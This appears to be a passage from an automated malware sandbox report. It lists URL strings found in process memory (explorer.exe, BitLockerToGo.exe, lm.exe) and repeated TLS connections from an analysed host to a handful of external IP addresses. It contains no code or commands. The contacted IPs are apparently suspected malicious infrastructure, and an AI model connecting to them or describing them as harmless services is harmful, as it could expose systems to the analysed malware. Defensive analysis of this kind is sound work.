Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000010.00000003.2612865714.00000000055C0000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2693116361.0000000003422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1697734591.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 62326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62280
Source: unknown	Network traffic detected: HTTP traffic on port 62303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62281
Source: unknown	Network traffic detected: HTTP traffic on port 62378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62284
Source: unknown	Network traffic detected: HTTP traffic on port 62252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62395
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62398
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62279
Source: unknown	Network traffic detected: HTTP traffic on port 62390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62295
Source: unknown	Network traffic detected: HTTP traffic on port 62308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62286
Source: unknown	Network traffic detected: HTTP traffic on port 62332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62287
Source: unknown	Network traffic detected: HTTP traffic on port 62395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62289
Source: unknown	Network traffic detected: HTTP traffic on port 62286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62297
Source: unknown	Network traffic detected: HTTP traffic on port 62356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62298
Source: unknown	Network traffic detected: HTTP traffic on port 62299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62299
Source: unknown	Network traffic detected: HTTP traffic on port 62337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62360
Source: unknown	Network traffic detected: HTTP traffic on port 62294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown	Network traffic detected: HTTP traffic on port 62339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62351
Source: unknown	Network traffic detected: HTTP traffic on port 62394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62354
Source: unknown	Network traffic detected: HTTP traffic on port 62354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62355
Source: unknown	Network traffic detected: HTTP traffic on port 62316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62356
Source: unknown	Network traffic detected: HTTP traffic on port 62371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62358
Source: unknown	Network traffic detected: HTTP traffic on port 62304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62371
Source: unknown	Network traffic detected: HTTP traffic on port 62360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62364
Source: unknown	Network traffic detected: HTTP traffic on port 62311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62367
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62381
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62382
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62383
Source: unknown	Network traffic detected: HTTP traffic on port 62305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62376
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62378
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62258
Source: unknown	Network traffic detected: HTTP traffic on port 62350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62390
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62270
Source: unknown	Network traffic detected: HTTP traffic on port 62295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62392
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62394
Source: unknown	Network traffic detected: HTTP traffic on port 62383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62384
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62387
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62388
Source: unknown	Network traffic detected: HTTP traffic on port 62355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62315
Source: unknown	Network traffic detected: HTTP traffic on port 62387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62316
Source: unknown	Network traffic detected: HTTP traffic on port 62364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62317
Source: unknown	Network traffic detected: HTTP traffic on port 62312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62318
Source: unknown	Network traffic detected: HTTP traffic on port 62278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62312
Source: unknown	Network traffic detected: HTTP traffic on port 62335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62329
Source: unknown	Network traffic detected: HTTP traffic on port 62370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62324
Source: unknown	Network traffic detected: HTTP traffic on port 62399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62337
Source: unknown	Network traffic detected: HTTP traffic on port 62340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62339
Source: unknown	Network traffic detected: HTTP traffic on port 62283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62336
Source: unknown	Network traffic detected: HTTP traffic on port 62266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62350
Source: unknown	Network traffic detected: HTTP traffic on port 62306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62349
Source: unknown	Network traffic detected: HTTP traffic on port 62277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62343
Source: unknown	Network traffic detected: HTTP traffic on port 62359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62346
Source: unknown	Network traffic detected: HTTP traffic on port 62351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62363 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62400
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62401
Source: unknown	Network traffic detected: HTTP traffic on port 62336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62306
Source: unknown	Network traffic detected: HTTP traffic on port 62386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62308
Source: unknown	Network traffic detected: HTTP traffic on port 62401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62309
Source: unknown	Network traffic detected: HTTP traffic on port 62298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62303

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:62252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:62260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:62261 -> 107.173.160.137:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:62275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:62279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:62312 -> 167.235.128.153:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62365 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62380 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62381 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62384 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62388 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62399 version: TLS 1.2
